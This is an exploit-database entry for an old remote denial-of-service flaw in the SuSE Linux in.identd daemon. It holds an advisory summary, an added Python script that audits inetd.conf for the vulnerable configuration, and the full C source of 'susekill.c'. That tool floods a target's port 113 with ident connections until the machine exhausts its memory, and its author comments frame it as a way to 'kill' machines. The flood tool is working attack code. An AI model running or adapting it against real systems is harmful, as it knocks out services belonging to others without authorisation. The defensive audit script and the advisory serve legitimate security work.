SuSE Linux in.identd Remote Denial of Service Vulnerability - exploit.company
Vendor: SuSE Linux
By: friedolin
CVSS: 7.5 (HIGH)
CWE: Remote Denial of Service
Product Name: SuSE Linux
Affected Version From: SuSE-Linux 4.4
Affected Version To: SuSE-Linux 6.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: SuSE-Linux 4.4 - 6.2, Slackware 3.2 and 3.6

SuSE Linux in.identd Remote Denial of Service Vulnerability

The in.identd daemon in SuSE Linux is vulnerable to a remote denial of service attack. By sending a large number of ident requests in a short period of time, an attacker can force the target machine to start multiple daemons, eventually causing the machine to run out of memory and halt.

Mitigation:

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/587/info

Under certain distributions of SuSE Linux, inetd.conf starts the in.identd daemon with the -w -t120 options. This means that one identd process waits 120 seconds after answering the first request before it answers the next one. If a malicious remote attacker starts a large number of ident requests in a short period of time, the target machine is forced to start multiple daemons because the initial daemon is in a time wait state. This can eventually starve the machine of memory, resulting essentially in a machine halt.
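A defensive check for the configuration described above, as an added example (not part of the original advisory or of susekill.c): it scans inetd.conf text for active in.identd entries started with -w and -t<seconds>. The sample file contents, the paths in it and the function name audit_identd are constructed for illustration.

```python
import re
from pathlib import PurePosixPath

# Constructed sample inetd.conf content (not taken from a real host).
SAMPLE_INETD_CONF = """\
# <service> <sock_type> <proto> <flags> <user> <server_path> <args>
ftp     stream  tcp  nowait  root    /usr/sbin/tcpd       in.ftpd
auth    stream  tcp  wait    nobody  /usr/sbin/in.identd  in.identd -w -t120
#auth   stream  tcp  wait    nobody  /usr/sbin/in.identd  in.identd -w -t120
ident   stream  tcp  nowait  nobody  /usr/sbin/in.identd  in.identd
"""

TIMEOUT_RE = re.compile(r"^-t(\d+)$")  # the -t<seconds> form the advisory names


def audit_identd(conf_text):
    """Return one finding per active in.identd entry started with -w and -t<N>."""
    findings = []
    for lineno, raw in enumerate(conf_text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank line or commented-out entry: not active
        fields = line.split()
        if len(fields) < 7:
            continue  # not a complete service entry
        # fields[5] is the server path and fields[6] is argv[0]; checking both
        # also catches entries launched through a wrapper program.
        names = {PurePosixPath(fields[5]).name, PurePosixPath(fields[6]).name}
        if "in.identd" not in names:
            continue
        args = fields[7:]
        timeouts = [int(m.group(1)) for m in map(TIMEOUT_RE.match, args) if m]
        if "-w" in args and timeouts:
            findings.append({
                "line": lineno,
                "service": fields[0],
                "inetd_flags": fields[3],
                "timeout_s": timeouts[0],
            })
    return findings


if __name__ == "__main__":
    for f in audit_identd(SAMPLE_INETD_CONF):
        print("line {line}: {service} runs in.identd with -w -t{timeout_s} "
              "(inetd flags: {inetd_flags})".format(**f))
```

On a real host, pass the contents of /etc/inetd.conf to audit_identd instead of the constructed sample.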

/* susekill.c by friedolin
 * 
 * used to kill lame SuSE Linux boxes with identd running
 * identd must be started with -w -t120 to crash a machine
 *
 * have fun, friedolin <hendrik@scholz.net>
 *
 * based on gewse.c by napster
 */

/* Tested systems:
 *
 * vulnerable:
 *
 *  SuSE-Linux 4.4 - 6.2
 *  Slackware  3.2 and 3.6
 *
 * not vulnerable:
 *
 *  RedHat 5.0 - 6.0 
 *  Debian 2.0 - 2.1
 * 
 * not tested:
 *
 *  pre 4.3 SuSE systems
 *  pre 5.0 RedHat
 *  pre 2.0 Debian
 *  other Slackware releases
 *  Caldera Open Linux, ...
 *
 * please send me your results and experiences !
 * 
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>  /* inet_ntoa() */

#define GETIDENT "1027, 6667 : USERID : UNIX : killsuse"

int sockdesc;
int portkill;
int numkill;
int x;

void usage(char *progname)
{
  printf("susekill by friedolin (based on gewse.c)\n");
  printf("usage: %s <host> <# of connections>\n",progname);
  exit(69);
}

int main(int argc, char *argv[])
{
    
 struct sockaddr_in sin;
 struct hostent *he;

 if (argc<3) usage(argv[0]);
  
 sin.sin_port = htons(113);
 sin.sin_family = AF_INET;
 
 he = gethostbyname(argv[1]);
 if (he) {
   sin.sin_family = AF_INET;
   sin.sin_port = htons(113);
   memcpy((caddr_t)&sin.sin_addr.s_addr, he->h_addr, he->h_length);
 } else {
   /* gethostbyname() reports failures through h_errno, not errno */
   herror("resolving");
   exit(69);
 }

 numkill  = atoi(argv[2]);

 printf("Flooding %s [%s] identd %d times.\n", argv[1], inet_ntoa(sin.sin_addr), numkill);
 printf("Killing");
 fflush(stdout);

 for (x=1;x<=numkill;x++) {

 sockdesc = socket(AF_INET, SOCK_STREAM, 0);

 if (sockdesc < 0) {
  perror("socket");
  exit(69);
 }
  
  if (connect(sockdesc, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
   perror("connect");
   exit(69);
  }

  printf(" .");
  fflush(stdout);
  (void) write(sockdesc, GETIDENT, strlen(GETIDENT));
 }

 printf("\n");
 return 0;

}